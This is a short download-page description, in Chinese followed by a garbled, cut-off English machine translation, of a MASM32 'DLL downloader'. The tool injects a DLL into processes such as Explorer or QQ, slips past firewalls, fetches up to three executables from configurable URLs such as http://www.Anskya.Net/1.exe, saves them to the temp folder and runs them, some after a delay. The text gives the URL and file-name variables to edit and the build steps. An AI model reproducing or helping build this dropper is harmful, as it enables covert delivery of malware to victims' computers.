资 源 简 介
编译说明:{
程序采用DLL插入--9x 和NT下都可以插入
穿防火墙,可以自定义三条连接
后面两个还可以休眠5秒后运行--具体看代码
程序编译压缩后只有2.7k
}
首先打开dlldownloader.asm文件~
url1s byte http://www.Anskya.Net/1.exe , 0
url2s byte http://www.Anskya.Net/2.exe , 0
url3s byte http://www.Anskya.Net/2.exe , 0
修改以上三个连接
exe1s byte heart1.exe , 0
exe2s byte heart2.exe , 0
exe3s byte heart3.exe , 0
这三个是保存的文件名--只需要填写文件名就可以了~~文件默认保存在临时文件目录
然后保存代码运行makeDLL.bat
然后直接运行makeEXE.bat
如果需要修改插入进程的话~修改
szExplorer byte Shell_TrayWnd , 0
中的类名----例如 QQ的窗口类名就是#32770
修改好以后就可以保存了~
然后运行makeEXE.bat就可以编译出来了
差点忘记~一定要装MASM32哦~~最好是V8.2-Compile Description: (sorry too lazy to paint Synthesizer)
(
Procedure used DLL insertion- 9x and NT can be inserted under all
Wear a firewall, you can customize the three connections
The latter two can also be sleep after 5 seconds to run- specifically look at the code
Program compiled compressed only 2.7k
)
First, open the file ~ dlldownloader.asm
url1s byte http://www